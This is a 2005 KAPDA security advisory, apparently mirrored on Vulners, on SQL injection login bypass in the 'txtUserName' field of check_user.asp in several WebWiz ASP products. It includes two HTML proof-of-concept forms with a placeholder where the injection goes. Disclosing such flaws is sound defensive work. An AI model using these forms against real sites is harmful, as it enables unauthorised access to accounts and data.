Vulners
Lucene search
kapda-18.txt
` [KAPDA::#18] - WebWiz Products SQL Injection
Happy new year ! :)
KAPDA New advisory
Vulnerable products :
webwiz site news access2000 : vesion 3.06 and prior versions
webwiz journal access2000 : version 1.0
webwiz weekly poll access2000 : version 3.06 and prior versions
database login access2000 : version 1.71 and prior versions
webwiz site news access97 : version 3.06 and prior versions
webwiz journal access97 : version 1.0
webwiz weekly poll access97 : version 3.06 and prior versions
database login access97 : version 1.71 and prior versions
Vendor: http://www.webwizguide.info
Risk: High
Vulnerability: SQL_Injection
Date :
--------------------
Found : Aug 14 2005
Vendor Contacted : Dec 30 2005
Release Date : Dec 30 2005
About WebWiz Products :
--------------------
Vendor`s description
WebWiz site news : http://webwizguide.info/asp/sample_scripts/site_news_script.asp
WebWiz journal : http://webwizguide.info/asp/sample_scripts/journal_application.asp
WebWiz weekly poll : http://webwizguide.info/asp/sample_scripts/weekly_poll_script.asp
WebWiz Password Login Page (Database Login) : http://webwizguide.info/asp/sample_scripts/database_login_script.asp
Discussion :
----------------
Some input passed to "check_user.asp" when logging in isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Vulnerabilities:
--------------------
SQL_Injection in "/[product]/check_user.asp" .
At parameter named 'txtUserName', Attacker can enter SQL command to login to the system.(For all products)
Proof of Concepts:
--------------------
<html>
<h1>WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://target/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>
<html>
<h1>WebWiz Login Bypass PoC - Database login - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://target/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>
Solution:
--------------------
No patch`s released yet by vendor.
Original Advisory:
--------------------
http://www.kapda.ir/advisory-167.html
Credit :
--------------------
DevilBox of KAPDA
devil_box [at} kapda.ir
Kapda - Security Science Researchers Insitute of Iran
http://www.KAPDA.ir
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Dec 2005 00:00Current
7.4High risk
Vulners AI Score7.4